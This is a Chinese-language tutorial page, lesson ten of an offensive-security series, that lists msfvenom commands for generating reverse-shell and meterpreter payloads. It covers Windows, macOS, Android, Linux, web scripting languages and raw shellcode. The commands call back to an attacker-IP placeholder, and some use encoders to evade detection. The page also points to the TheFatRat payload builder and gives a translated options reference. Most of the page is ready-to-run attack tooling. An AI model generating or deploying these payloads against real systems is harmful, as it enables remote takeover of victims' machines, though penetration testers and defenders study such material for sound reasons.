第十課:msfvenom常用生成payload命令
專注APT攻擊與防御
https://micropoor.blogspot.com/
windows:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻擊機(jī)IP LPORT=攻擊機(jī)端口 -e x86/shikata_ga_nai -b 'x00x0axff' -i 3 -f exe -opayload.exe
mac:
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻擊機(jī)IP
LPORT=攻擊機(jī)端口 -f macho -o payload.macho
android:
//需要簽名
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻擊機(jī)IP LPORT=攻擊機(jī)端口 -f apk -o payload.apk
powershell:
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=
攻擊機(jī)IP LPORT=攻擊機(jī)端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1
linux:
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻擊機(jī)IP LPORT=攻擊機(jī)端口 -f elf -o payload.elf
php:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=
<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d 'n' > shell.php && pbpaste >>
shell.php
aspx:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=
攻擊機(jī)IP LPORT=攻擊機(jī)端口 -f aspx -o payload.aspx
jsp:
msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=攻擊機(jī)IP LPORT=攻擊機(jī)端口 -f raw -o payload.jsp
war:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻擊機(jī)IP LPORT=攻擊機(jī)端口 -f raw -
o payload.war
nodejs:
msfvenom -p nodejs/shell_reverse_tcp LHOST=攻擊機(jī)IP LPORT=攻擊機(jī)端口 -f raw -o
payload.js
python:
msfvenom -p python/meterpreter/reverse_tcp LHOST=攻擊機(jī)IP LPORT=攻擊機(jī)端口 -
f raw -o payload.py
perl:
msfvenom -p cmd/unix/reverse_perl LHOST=攻擊機(jī)IP LPORT=攻擊機(jī)端口 -f raw -o
payload.pl
ruby:
msfvenom -p ruby/shell_reverse_tcp LHOST=攻擊機(jī)IP LPORT=攻擊機(jī)端口 -f raw -o
payload.rb
lua:
msfvenom -p cmd/unix/reverse_lua LHOST=攻擊機(jī)IP LPORT=攻擊機(jī)端口 -f raw -o
payload.lua
windows shellcode:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=
攻擊機(jī)IP LPORT=攻擊機(jī)端口 -f c
linux shellcode:
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻
擊機(jī)IP LPORT=攻擊機(jī)端口 -f c
mac shellcode:
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻擊機(jī)IP
LPORT=攻擊機(jī)端口 -f c
便捷化payload生成:
項目地址:https://github.com/Screetsec/TheFatRat
root@John:~/Desktop# git clone https://github.com/Screetsec/TheFatRat.git
//設(shè)置時需要掛墻
附錄:
中文使用說明:
Options:
-p, --payload <payload> 使用指定的payload
--payload-options 列出該payload參數(shù)
-l, --list [type] 列出所有的payloads
-n, --nopsled <length> 為payload指定一個 nopsled 長度
-f, --format <format> 指定payload生成格式
--help-formats 查看所有支持格式
-e, --encoder <encoder> 使用編碼器
-a, --arch <arch> 指定payload構(gòu)架
--platform <platform> 指定payload平臺
--help-platforms 顯示支持的平臺
-s, --space <length> 設(shè)定payload攻擊荷載的最大長度
--encoder-space <length> The maximum size of the encoded payload
(defaults to the -s value)
-b, --bad-chars <list> 指定bad-chars 如: 'x00xff'
-i, --iterations <count> 指定編碼次數(shù)
-c, --add-code <path> 指定個win32 shellcode 文件
-x, --template <path> 指定一個 executable 文件作為模板
-k, --keep payload自動分離并注入到新的進(jìn)程
-o, --out <path> 存放生成的payload
-v, --var-name <name> 指定自定義變量
--smallest Generate the smallest possible payload
-h, --help 顯示幫助文件
Micropoor
?
